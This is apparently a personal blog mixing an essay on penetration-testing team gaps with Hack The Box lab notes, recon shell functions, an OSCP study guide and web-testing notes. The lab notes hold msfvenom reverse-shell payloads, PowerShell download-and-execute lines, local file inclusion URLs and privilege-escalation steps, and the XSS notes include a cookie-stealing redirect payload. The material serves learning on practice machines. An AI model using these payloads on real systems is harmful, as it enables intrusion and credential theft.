Implemented cyber/info Security and common Gaps - A short analysis as per organization, technical and management prospective

 

Your opinions are welcomed and appreciated.

Implemented cyber/info Security and common Gaps - A short analysis as per organization, technical and management prospective:

Generally, a company used to have multiple security solutions along with many teams of security professional with a huge budget to handle organizations data/info from security breach. Multiple security teams may be like as:

1.       Penetration Testing Team

2.      SOC Team

3.      Threat Hunter/Security researcher

4.      DLP Team

5.      Compliance Audit Team

6.      Third Party Vendor management team

7.      Security Owner (Project wise)

8.      Phishing Campaign Runner or working towards employee behavior for security

9.      Network operation team

Etc.

There is a huge budget/expenses occur in managing all these teams for any company. Even after these teams deployed and working towards their responsibility, we are seeing such HACK/Breach on a day-to-day basis for different organizations. Which requires analysis from organization point of view, where is the gap exactly. Is there additional team required or a bit of Job responsibility need to be change for different teams to remediate such possible GAP. Let’s try to dig a bit to find the answer and Gap.

I’ve worked in few of these security teams for multiple organizations and trying to add the real time work culture/responsibility here in short along with common gaps. Analyzing for all the teams will be much longer here (which may we can discuss if required) so let’s see for the pentesting.

1.      Penetration Testing Team – Generally make security assessment towards identifying the vulnerability before the hacker catches it, of assets (App/Infra/network & Security devices) either before go-live or for the live applications. The work area also somewhere lies related towards vulnerability management and tracking.  

Common gap which can be seen from here:

a)      Identified vulnerability remains open for long sometimes (may be multiple reason for it such as dependencies on different teams/technologies, major modifications required in applications, end of support from OEM, patch releasing is getting delayed, Down time not available for change/upgrade, lack of budget, etc…). It means identified existing risk remains open which may be an easy access point for attacker.

 

Solution:

·        A proper vulnerability management is required what need to be done in which case. Priories the risk/vulnerability remediation based on the severity. Fix a time period identified such as 20/30/40 days to remediate critical vulnerabilities, for High 30-60 days, etc. It can vary as per org and asset.

·        Also a retest need to be performed after remediation.

·        Even a complete remediation is getting delayed, mitigation with compensating controls can be attempted.

·        Sometimes hard call such as decommissioning of assets can be taken if there is no remediation possible. (sometimes Identifying an alternative solutions/creating new app may be much cheaper than data breach cost)

 

b)     Testing environment – Generally tester perform (or asked to perform) test in non-production environment (may it can be due to high risk of application crash, real time data tempering, customer data exposure to tester, etc…). which fall under a partial testing in few scenarios. (Partial testing – may be software code/application get analyzed in UAT, no test of underlaying Infra associated with application, Configuration of application in production environment have not been assessed).  Here the product owner will have confidence that their application is secured which may be false or partial true.

 

Solution:

·        Generate a framework organization wise which can ensure the production environment testing.

·        If compete production environment testing is not possible, go with UAT (exact replica of production) with partial production testing. Make sure underlaying infra of application along with configuration of application environment have getting assessed.

c)      Pentester Experience – In many cases, pentester deployed does not have required experience/ skill sets which may lack to identify even a common security gap.

 

Solution:

·        Perform a proper due diligence for the deployed vendor/tester

·        Make sure a primary assurance implemented means challenge tester on quality of testing and report.

 

d)     Strict timeline – Number of man-days testing is getting limited by app owner or company to save budget and due to it the vendor/tester have to submit report whether all the attack surfaces have been analyzed or not.

 

Solution:

·        Again a organization wise framework required to fix minimum man-days testing for different applications fall under different category/severity. Again, here a wide anysis (based on asset type/size/ crown jewels analysis/BIA analysis/…)  is required to add application is different category and assign man-days testing based on it.

 

e)     Sometimes senior management remain unaware about the open gaps or pentesting team keeping them with false assurance that everything is running fine. Which may result of a big loss anytime.

 

Solution:

·        Here it is required to add an important knowledgeable person as a   pentest activity lead/ Pentest assurance team which can understand the real time objective of the complete pentest activity and ensure the periodic in-depth security assessment/vulnerability management on track and reporting to management.

 

f)       Similar way few more gap can be seen.

 

Identification of the issue/Gap is real challenge than getting a solution. I’m open for your comment and ready to discuss / understand the reader thinking on it….

 

 

 

My Technical record related to penetration testing, HTB ,...

 

1.      Ctrl+Shift+R  - reverse search – search from history in Linux terminal

2.     Tmux  -  tmux is a terminal multiplexer for Unix-like operating systems. It allows multiple terminal sessions to be accessed simultaneously in a single window

 

3.      nmap -sV -O -F --version-light 10.10.10.4

a.      -sV: Probe open ports to determine service/version info

b.      -O: Enable OS detection

c.       -F: Fast mode - Scan fewer ports than the default scan

d.      --version-light: Limit to most likely probes (intensity 2)

e.      10.10.10.4: IP address of the Legacy box

 

4.     Check for a exploit on a shell opened machine: Required for Privilege Escalation:

https://www.freecodecamp.org/news/keep-calm-and-hack-the-box-devel/

 

use post/multi/recon/local_exploit_suggester

then set session 1

This module suggests local Meterpreter exploits that can be used. The exploits are suggested based on the architecture and platform that the user has a shell opened as well as the available exploits in Meterpreter.

 

5.      Search for a file in rce system:

è search -f user.txt

6.  Create Exploit using msfvenom:

àmsfvenom -p windows/meterpreter/reverse_tcp -f aspx -o devel.aspx   LHOST=10.10.14.15 LPORT=4444

-p: Payload to use

-f: Output format

-0: Save the payload to a file

LHOST: Local host

LPORT: Local port

Now upload a file (by put/upload/download by python server)

Start listening on multi/handler and then run the uploaded exploit on victim machine – it will create session

 

7.  Check for FTP service by NMAp à

è nmap -A -p21 -v 10.10.10.5

8.  Elastix login portal à is an unified communications server software that brings together IP PBX, email, IM, faxing and collaboration functionality. It has a Web interface and includes capabilities such as a call center software with predictive dialling.

 

Available exploit for Elastix - 2.0 - 'graph.php' Local File Inclusion

Payload à https://10.10.10.7/vtigercrm/graph.php?current_language=../../../../../../../..//etc/amportal.conf%00&module=Accounts&action

9.  SSH connect à ssh root@10.10.10.7

10. Get details of exploit by searchploit à  searchsploit -x 18770.txt

11. In case of OpenSSL in exploit – can be set proxy à set proxies http:127.0.0.1:8080

12.   Default Worldlist path of Dirbuster à /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt

13.   Vtiger vulnerable version – 5.4.0 – RCE/CSRF/LFI  à searchsploit vtiger,

https://localhost/vtigercrm/modules/com_vtiger_workflow/sortfieldsjson.php?module_name=../../../../../../../../etc/passwd%00

view-source:https://10.10.10.7/vtigercrm/modules/com_vtiger_workflow/sortfieldsjson.php?module_name=../../../../../../../../../etc/asterisk/manager.conf%00

14.   nmap script to get more things from that rpcbind    à nmap -sV --script=nfs-showmount -oN remote.nfs remote.htb

15.   Mount a backup if any unmounted site backup available à sudo mount -o nfsvers=4 -t nfs remote.htb:/site_backups /mnt

16.   Strart Apache service à systemctl start apache2

17.   NMAP - 80/tcp open  http    HttpFileServer httpd 2.3  -

Exploit -Rejetto HTTP File Server (HFS) 2.3.x - Remote Command Execution (2) 

 

18. SET payload for 64 bit system - set payload windows/x64/meterpreter/reverse_tcp

19.   Privilege escalation – in windows 2012 r2 – exploit – MS16-098 – 41020.exe

àC:\Users\kostas\Desktop>41020.exe

41020.exe

Microsoft Windows [Version 6.3.9600]

(c) 2013 Microsoft Corporation. All rights reserved.

à C:\Users\kostas\Desktop>cd C:\Administrator\Desktop

àC:\Users\Administrator\Desktop>type root.txt

20.   Command to take data in clipbord à Cat abc.txt |xclip   

21.   Run a server in kali on port 8000àPython -m SimpleHTTPServer 

22.   Run on victim machine to download the file à powershell “IEX(New-Object Net.WebClient).DownloadString('http://10.10.14.16:8000/exploit.html')”

23.   msfvenom -p windows/meterpreter/reverse_tcp lhost=10.10.14.16 lport=4444 -f exe > writeup.exe

24.   powershell "(new-object System.Net.WebClient).Downloadfile('http://10.10.14.16:8000/writeup64.exe', 'writeup64.exe')"

25.   If METERPRETER running, check the running process à ps

26.   Migrate on any running processes à migrate process_ID.

27.   Unset a set value in Metasploit à unset parameter

28.   Ncat -lvnp 4444 à allies l-listen, v-verbos, n- don’t do dns, p-port

29.   If get user session on target machine, now need to move with admin previleges -> migrate to a stable session in window ->  3004  580   davcdata.exe       x86   0        NT  AUTHORITY\NETWORK SERVICE  C:\WINDOWS\system32\inetsrv\davcdata.exe

 à migrate 3004

30.   A exploit in windows 2003 r2 for admin privileges escalation --windows/local/ms14_070_tcpip_ioctl

...

Recon for a security bug by automation - .bash_script - Automation tool

Run the command by automation –

Dirsearch(){

Python3 ~/tools/dirsearch/dirsearch.py -u $1 -t  $2 -e $3

}           #u =url, t= no. of , e- extension 

Bash Program – For automation:

è Nano auto.sh

for domain in ‘crtsh $1’; do

echo $domain | tee -a /Desktop/Recon/$1_22-6-2020.txt

curl -I -s $domain | tee /Path/Recon/curlout/$domain_22-6-2020.txt

done

Webfuzzing for critical file and directory   -à nano autoWebFuzz.sh

for domain in ‘crtsh $1’; do

echo $domain | tee -a /Desktop/Recon/$1_22-6-2020.txt

wfuzz -c -z file,/Path/Payloads/DirSrc_CritFile.txt --sc 200 http://$domain/FUZZ | tee /Desktop/Recon/WebFuzzFileDirout/$domain_22-6-2020.txt

done

certspotter(){

curl -s https://certspotter.com/api/v0/certs\?domain\=$1 | jq '.[].dns_names[]' | sed 's/\"//g' | sed 's/\*\.//g' | sort -u | grep $1

} #h/t Michiel Prins

crtsh(){

curl -s https://crt.sh/?Identity=%.$1 | grep ">*.$1" | sed 's/<[/]*[TB][DR]>/\n/g' | grep -vE "<|^[\*]*[\.]*$1" | sort -u | awk 'NF'

}

dirsearch(){ #runs dirsearch and takes host and extension as arguments

python3 /Path/tool/dirsearch/dirsearch.py -u $1 -e $2 -t 50 -b

}

certnmap(){

curl https://certspotter.com/api/v0/certs\?domain\=$1 | jq '.[].dns_names[]' | sed 's/\"//g' | sed 's/\*\.//g' | sort -u | grep $1  | nmap -T5 -Pn -sS -i - -$

}

ipinfo(){

curl http://ipinfo.io/$1

}

crtshdirsearch(){ #gets all domains from crtsh, runs httprobe and then dir bruteforcers

curl -s https://crt.sh/?q\=%.$1\&output\=json | jq -r '.[].name_value' | sed 's/\*\.//g' | sort -u | httprobe -c 50 | grep https | xargs -n1 -I{} dirsearch -u {} -e $2 -t 50 -b

}

s3ls(){

aws s3 ls s3://$1

}

s3cp(){

aws s3 cp $2 s3://$1

}

Make a permanent tool:

  sudo nano /bin/crtsh

  curl -s https://crt.sh/?Identity=%.$1 | grep ">*.$1" | sed 's/<[/]*[TB][DR]>/\n/g' | grep -vE "<|^[\*]*[\.]*$1" | sort -u | awk 'NF'

sudo chmod +x /bin/crtsh

nano .profile    -  remove crtsh from here

source .profile

Reference -  https://github.com/nahamsec/recon_profile/blob/master/.bash_profile

Clipboard Stopped working in Virtual Box Kali Linux: Display Screen Size in Virtual Box:

Clipboard Stopped working in Virtual Box Kali Linux:

The used to happen if guest ISO version is getting mismatch with respect to virtual box version or extension pack version. if you are trying to update and upgrade then this used to happen of version mismatch. 

Solution: Bring all three on same version. If updating virtual box with the latest version. Make sure update the extension pack on the same version. Next - update the guest addition ISO on the same version from Device Tab -> Insert Guest additions CD images(If it is already there then first login to  kali and removed cd image added as unmount) -> then install

Installation process - > chmod  +x VBoxLinuxAddition.run

and then -> sudo ./VBoxLinuxAdditions.run

and finally -> sudo reboot

This will solve the clipbord problem 

.

Guest addition ISO is also used for solving the screen size issue in virtual box. Without it, screen size is not working properly.

OSCP Guide - (By Rajesh)

 Things Required for OSCP Preparation
A ‘NEVER GIVE UP’ attitude
Basic Linux usage skills
A bit of programming knowledge
Ability to read and understand the flow of public exploits
Creative hacker way of thinking
Lots of interest, patience, and enthusiasm
We will divide the OSCP journey into 2 phases:

Pre-Enrolment
Post Enrolment
Pre-Enrolment
If you are not a newbie in Pen testing and aware of buffer overflow exploitation, you can skip this section and start enrolling.

For the rest, you need to cover the following aspects:

Basics
Get handy in using Linux. If you are new to Linux, refer the Linux command guide http://linuxcommand.org. Practice all the common commands, and refer the man page for each of these commands.
Pro-tip: If you have more time in your hands and want to Learn Linux in a fun way, you can try the wargames here http://overthewire.org/wargames/

If you are not aware of programming languages, it is highly recommended to learn one. I would recommend learning Python. An awesome simple tutorial by Vivek Ramachandran is preferable http://www.pentesteracademy.com/course?id=1
Check out various videos on YouTube on basic concepts such as port-scanning, web application testing, etc. Sometimes research on simple concepts will give good ideas on enumeration, for e.g., How SSH works, How service runs on ports, How Sockets works etc.

Metasploit

Metasploit is a very powerful tool and it is necessary for all the pen testers to know how to use it. Especially the Metasploit post-exploitation modules. Refer to the following links:

Vivek Ramachandran’s Metasploit Megaprimer Videos: http://www.securitytube.net/groups?operation=view&groupId=10

Metasploit unleashed by Offensive Security:

https://www.offensive-security.com/metasploit-unleashed/

Usage of Metasploit in the exam is limited to only one machine, but still, you can practice it in labs to know about the tool in depth.

Buffer Overflow

Buffer overflow is a very important concept you should practice. Because, if you are good at exploiting buffer overflows, you are sure to get the maximum point machine in the practical exam. But don’t worry if you know nothing about buffer overflows. The following steps will make you not only understand the concept of a buffer overflow, but you can also do it by yourself.

1. A quick intro on buffer overflow.

https://www.youtube.com/watch?v=1S0aBV-Waeo

What is Buffer Overflow? (very clearly explained). After watching this video, you will get an idea on the concept behind buffer overflow. Also, will increase your urge to learning buffer overflow.

2. Assembly language primer by Vivek Ramachandran. http://www.securitytube.net/groups?operation=view&groupId=5

Don’t get bored after seeing Assembly language. Just go through the first 2 videos in this video series. That is enough for understanding the memory layout.

3. Buffer Overflow Megaprimer by Vivek Ramachandran. http://www.securitytube.net/groups?operation=view&groupId=4 .

In-depth video of buffer overflow where its explained in a very detailed way.

4. Exploit Research Megaprimer by Vivek Ramachandran. http://www.securitytube.net/groups?operation=view&groupId=7

Real-time Exploitation of buffer overflow which will be very interesting, where exploitation is explained in stepwise clearly. You can even try it yourself as mentioned in the video for your practice. It’s enough to go through the first 5 videos. SEH Based buffer overflow is not required for OSCP.

If you follow the above steps, you will be able to do exploitation with buffer overflow by yourself 100%.

Many people shy away from preparing for buffer overflows because it helps to exploit only one machine in the exam. But still, it’s a very important and interesting concept. I have seen many people failing because of improper preparation on buffer overflows. Moreover, OSCP is not the target. All the things you learn here is for the real world.

Some Valuable Resources

These are some valuable resources which I found very useful in my OSCP Preparation. Many of them are now permanent reference resources even after I have cleared my OSCP.

Enumeration

http://www.0daysecurity.com/penetration-testing/enumeration.html

https://nmap.org/nsedoc/

https://www.youtube.com/watch?v=Hk-21p2m8YY

Shell Exploitation

http://pentestmonkey.net/cheat-sheet/shells/reverse-shell-cheat-sheet

http://www.lanmaster53.com/2011/05/7-linux-shells-using-built-in-tools/

https://netsec.ws/?p=331

Windows Privilege Escalation

http://www.fuzzysecurity.com/tutorials/16.html

https://www.youtube.com/watch?v=kMG8IsCohHA

https://www.youtube.com/watch?v=PC_iMqiuIRQ

https://github.com/GDSSecurity/Windows-Exploit-Suggester

Linux Privilege Escalation

https://blog.g0tmi1k.com/2011/08/basic-linux-privilege-escalation/

https://www.youtube.com/watch?v=dk2wsyFiosg

Privilege escalation recon scripts:

http://www.securitysift.com/download/linuxprivchecker.py

http://pentestmonkey.net/tools/audit/unix-privesc-check

Research and document

OSCP is difficult – have no doubts about that! There is no spoon-feeding here. Refer to all the above references and do your own research on topics like service enumeration, penetration testing approaches, post exploitation, privilege escalation, etc. Remember, always take notes as text with a separate note.

POST ENROLLING

Knowledge and expert skills don’t come immediately to anyone. They must be worked upon. But first, you need to get started! So, if you are anywhere near the idea of attempting the OSCP, just enroll and get started. Once you are good with all the above pre-enrolling, you are fully ready to enroll for the OSCP.

The main thing in OSCP is the lab.

OSCP is not about clearing the exam. It’s all about working deeply on labs.

In General,

It’s not about the destination. It’s all about the journey.

So, it is recommended to take 2 or 3 months lab. 1 month lab will never be enough for learning. If you have enough time to work dedicatedly on weekdays, you can take 2 months. Else take 3 months minimum.

Once you enroll, you will be given a time where you will receive your materials and lab connectivity packs. Approximately 20 days from the date of enrolling.

The period before getting Lab Connections

This period could be used to test your research ideas on some other OSCP lab similar stuff.

Refer to the vulnhub machines in the following link.

http://www.abatchy.com/2017/02/oscp-like-vulnhub-vms.html

The VMs in the above link are OSCP-like VMs. Generally, CTFs are different than the vulnerable machines in the OSCP labs. CTFs have a puzzle-like approach, whereas OSCP labs are the ones which will be like a real-world simulation.

The VMs in the above link will be like OSCP labs. You can start solving these VMs. For the vulnhub VMs, there are walkthroughs for each machine. You can try each machine first by yourself. Else read the walkthrough, understand it, and then try to implement the method again in the VMs.

Also, try this https://www.hackthebox.gr/

It is also a network which has machines like OSCP Labs.

Document all your steps and take notes of every new concept you learned.

Welcome to OSCP

You will get your training materials (in PDF), video materials, and lab connectivity pack via email. The link for the pdf and video will expire in 2 days. You should download and back it up before that. Check your lab connectivity as mentioned in the lab connectivity guide. Don’t start diving into labs immediately. Follow the below-given steps once you receive the email.

Go through the video material
Go through the pdf completely
Do the exercises in pdf and document it.
Most people only go through the video and then start labs. But that is the biggest mistake. The PDF has a lot more than what is mentioned in the videos. Do not feel bored when going through all the material and doing the exercises. Remember the proverb by Abraham Lincoln.

OSCP

The exercises in the PDF help in sharpening one’s axe. I found some useful tips and tricks whenever I used to get stuck in the lab exercises.

What’s more, you will get an additional 5 points for submitting exercise documentation.

Let the Hacking Begin

Now is the main part of OSCP. The labs. The lab environment consists of 55 machines each with a different approach and different difficulty level. The lab infra has 4 networks. Public, IT, Development, and Admin network. You will get direct access only to the public network. You need to unlock other networks by the secret keys obtained by proper post exploitation. You will be connected to other networks by port forwarding and proxy chaining. A lab is a place where you try out all your research ideas and various tools.

Before starting the lab machines, go through the buffer overflow exploitation in the video material 2-3 times and practice the same on your dedicated Windows 7 machine provided along with the lab machines. Same tools explained in the material will be there on your Windows 7 machine. Practice buffer overflow by following the same steps used by the instructor.

Exploiting a machine is a Systematic Process:

Find the open ports and services running on ports
Enumerate the services and the machine
Exploit the correct vulnerability and gain access
Do proper post exploitation enumeration
Privilege Escalation
For some machines, you will get direct admin/root/system access at the initial stage itself. But still, you need to do proper post exploitation enumeration on that machine. This is because in the labs the information gathered on post exploitation on one machine will be used to solve another one.

There are 4 main difficult machines in the OSCP lab called as pain, sufferance, humble and gh0st. its nature is as per the name. I gained a lot of confidence after solving these machines.

You need to give your maximum dedication in the labs. Do the research, lots and lots of research. Try all

kind of possibilities, try stupid things. Google is your friend. Always use Google at any point and at every machine. Google everything that is in front of you. You will experience lots and lots of pain, frustration, etc. Many times you may lose your patience. But NEVER GIVE UP!

Try Harder. If you get stuck and you don’t know how to proceed, you can visit offsec student forums

https://forums.offensive-security.com/

Log into you OS ID and navigate to lab machine discussion. You will find some useful hints.

Also, you can join a slack team https://netsecfocus.slack.com and request them to add you to the OSCP channel. You can get some useful ideas here.

But nowhere no one will give you a direct solution for any of the lab machines. You will only get a small hint and some suggestions. You must figure out the solution by yourself.

Remember, the enumeration is the key for OSCP. It took me 2 months to know the exact meaning of enumeration. Never get excited to exploit any machine at first. Do not follow the approach of monkey testing and blindly downloading and running the exploits. Trust me, this approach will make you fall into a rabbit hole. There will be some decoy vulnerabilities to trick you in the wrong direction.

So, what is the approach?

Only with proper enumeration, you can successfully exploit any target.

Do a full port scan on the target.
Refer fyodor’s defcon video on “nmap: scanning the internet” https://www.youtube.com/watch?v=Hk-21p2m8YY

Enumerate every port. Find what service is running. If you are unaware, simply google the port. Also refer to the below article.
http://www.0daysecurity.com/penetration-testing/enumeration.html

After understanding the target, now try to find vulnerabilities. Some target might be exploitable with more than 1 way
If you find a vulnerability, read about that vulnerability. Many of the exploits will not work without modification. So, learn the vulnerability and read the exploit carefully. Sometimes, there will be another manual way of exploiting the vulnerabilities instead of using public exploits. So, google a lot. Pages not listed under top will also have some useful stuffs. Refer all pages.

In some cases, the machine might be busy since other students will also be working. So, revert the machine and try again. Look for the attacks on the vulnerability online. There will be many blogs written on how to exploit that vulnerability.

Once you gain access to the system, always upgrade your shell. Enumerate well. Search for misconfigurations, credentials, try to use the credentials at whichever place possible.

It is not required to solve all the machines to take the exam. It’s for enhancing your pentest skills. I’d recommend getting at least 25+ targets and 2 of the four difficult ones. If you can’t solve these many target machines then you probably need to extend the labs and start working on it.

Document all your lab works and take notes of everything that you learned. Submitting the lab report will give you an additional 5 points.

The Exam

Once you are confident enough after working in the labs, you can take the exam. Make sure you schedule your exam date at least 1 month in advance.

You need proper sleep, food, and regular breaks during the exam. Because your brain needs to function 2-3 times more creatively and spontaneously than usual.

Grab all your notes, lab notes and make a revision before starting.

Metasploit usage is restricted in the exam. You should use it only once. So, use it wisely.

Never lose your patience and stay calm. Enumerate, enumerate, and enumerate. Never leave anything. Try all stupid things. Do not panic. Assume like you are working in the lab.

After completing the exam, you will be given 1 day to prepare the report and send them. There will be a report template in the reporting guide. You can use your own report as well. Read the offsec reporting guide carefully before starting the report and send them in the exact format and the way they are mentioned.

Tips for Exam

Be confident
Be very cool and calm
Never bother if you didn’t get access to one or two machines in short time as mentioned in other blogs
Enumerate well
Take regular breaks. Go for a small walk and get some fresh air.
Take screenshots and POCs immediately after each exploitation steps.
Submit the flags (local.txt & proof.txt) in the exam panel immediately once you retrieve them
I have seen many people failing in the exam once they lose their patience. So never get tensed. Always be calm and relaxed. TRY HARDER!

Conclusion

OSCP is not just a certification. It is an awesome journey which teaches you many things apart from a technical perspective. It will teach you to think creatively, develop a ton of patience and most of all you will ‘NEVER GIVE UP’.

(#1) Kioptrix: 2014 https://www.vulnhub.com/entry/kioptrix-2014-5,62/
(#2) FristiLeaks: 1.3 https://www.vulnhub.com/entry/fristileaks-13,133/
(#3) Stapler: 1 https://www.vulnhub.com/entry/stapler-1,150/
(#4) VulnOS: 2 https://www.vulnhub.com/entry/vulnos-2,147/
(#5) SickOs: 1.2 https://www.vulnhub.com/entry/sickos-12,144/
(#6) Brainpan: 1 ttps://www.vulnhub.com/entry/brainpan-1,51/
(#7) HackLAB: Vulnix https://www.vulnhub.com/entry/hacklab-vulnix,48/
(#8) /dev/random: scream https://www.vulnhub.com/entry/devrandom-scream,47/
(#9) pWnOS: 2.0 https://www.vulnhub.com/entry/pwnos-20-pre-release,34/
(#10) SkyTower: 1 https://www.vulnhub.com/entry/skytower-1,96/

Related Security Test - XSS, IDOR, Host Header Attack

Information gathering:

1. site

2. subdomains -> virustotal.com

3. IP address -> ping any.com

4. Find the programming language of the website:

Google Search – site:any.com .jsp/aspx/php/asp/jspx...

Kali – whatweb any.com (and find X-Powered-By)

5. Open ports and Services:

nmap domain/ip

nmap ip -Pn (if ping probe is blocked by normal scan)

aggressive scan: nmap ip -sV (if blocking, append in last -Pn)

Detailed scan: nmap ip | nmap -sC ip

6. Servers info:

whatweb any.com or ssltest.com (in signature many more things)

intruder in burpsuite :

Attack type :– Sniper – (will apply payload on single parameter where payload apply)

Battering Ram – (One payload will apply in on the parameters)

upload payload and check for 200 status after browsing <- checked URL encoding

<- Uncheck URL encoding

XSS:

prompt.ml -> A website to test XSS with different challenges/payloads

Find parameter which is reflecting back –> test it manually or upload payload through the intruder

By intruder and loaded payload -> on 0 payloads, if it gets executed the length is small so the attacked payload will have a length greater than 0. or it may exist on lower length as well.

URL redirection -> <script>document.location.href=”http://bing.com”</script>

Phishing: <iframe src=”http://bing.com”><iframe>

cookie stealing: <script>alert(document.cookie)</script>

<script>document.location.href=”http://bing.com/p/?page =”+document.cookie</script>

Through File uploading -> if file upload option is available and file name is visible in source code after uploading(file name is reflecting) then it may be XSS. Apply payload of XSS on the name of file and check.

IDOR – Insecure Direct Object Reference

Login by account A. -> Edit Profile A. -> Capture User ID , suppose - abcd

Login by Account B -> Edit profile B -> pass used ID of A here and forward. -> Now check the changes in account A

User reference can be changed at URL

Host Header Attack: Open Redirection

Check the status code = 200, 201,202..or 300, 301,..(2XX or 3XX)

Below the get method:

1. Now capture the request -> Host: replace the real website to testing website like bing.com

If it is redirecting to the bing.com then there is a host header attack.

2. change realweb.com to bing.com and set X-Forwarded-Host to realweb.com

like – Host: bing.com

X-Forwarded-Host: realweb.com

3. Vice-versa of 2^nd point

Host Header Attack: Web Cache Poising

4. Change the Host similar as above - Host: bing.com

In response, if it is visible in href: bing.com then there is web cache poising

In the browser, the response will be as a link. When it will be clicked on UI, it will redirect to bing.com

Host Header Attack: Password Reset Page

5. Suppose a website is sending password reset link for password reset

An attacker changed the host from this link on mail. Now when the user tries to change the password, this won’t work(host in url is different) but the attacker will get the requested link(password reset link) in the log and he/she can change user’s password by manually changing the url host from that link.
                        Reference- (These contents are part of notes prepared by me - from multiple sources. Major parts are taken from Vikash Chaudhary course from Udemy(for more details visit this course on Udemy))